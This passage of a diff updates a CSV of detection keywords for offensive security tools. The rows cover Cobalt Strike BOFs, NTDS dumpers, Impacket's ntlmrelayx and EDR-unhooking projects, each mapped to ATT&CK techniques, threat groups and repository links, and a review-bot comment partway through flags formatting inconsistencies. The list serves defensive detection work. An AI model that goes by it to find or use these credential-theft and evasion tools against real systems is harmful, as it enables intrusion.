APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ntcreatethread.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ntcreatethread.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ntcreatethread.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*NtCreateUserProcessShellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" -"*ntdissector -*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*ntdissector-main*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntdissector -*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntdissector-main*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" "*Ntdll_SusProcess.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*NTDLLReflection-main*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*NtdllUnpatcher.cpp*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" 
@@ -14190,16 +14353,16 @@ "*NtdllUnpatcher.sln*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher_Injector*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher-master*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" -"*ntds/ntds.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*ntds_grabber.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ntds/ntds.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntds_grabber.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ntdsdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*NTDSgrab.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ntfs-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*NTDSgrab.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ntfs-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ntlm.py *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ntlm_info_enumeration.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ntlm.py *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ntlm_info_enumeration.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ntlm-info.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*ntlmquic.*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmquic-go*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over 
QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" 
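Review bot: The three metasploit rows on the added side of this hunk (`*ntds_grabber.md*`, `*NTDSgrab.ps1*`, `*ntlm_info_enumeration.*`) still carry `T1204 -T1210` in metadata_tool_techniques, which breaks the ` - ` separator used everywhere else in that column. A consumer that splits the field on ` - ` to map keyword hits to ATT&CK techniques would presumably get one malformed `T1204 -T1210` token and lose both IDs. Since these lines are being rewritten anyway, the value should read `T1204 - T1210`. Separately, the two added `*NTLMChallengeBase64*` rows share the same keyword but differ in metadata_enable_proxy_detection (`0` vs `1`) and metadata_comment (`Invoke-Tater.ps1` vs `N/A`). If both are intentional, giving the second row a distinguishing comment would help anyone de-duplicating on the keyword column; otherwise they look like candidates for merging.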
@@ -14213,18 +14376,18 @@ "*NTLMRelay2Self.git*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" "*ntlmrelayx -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ntlmrelayx --*","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ntlmrelayx.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ntlmrelayx.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ntlmrelayx.py.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*ntlmscan.py*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*ntlmscan-master.zip*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - 
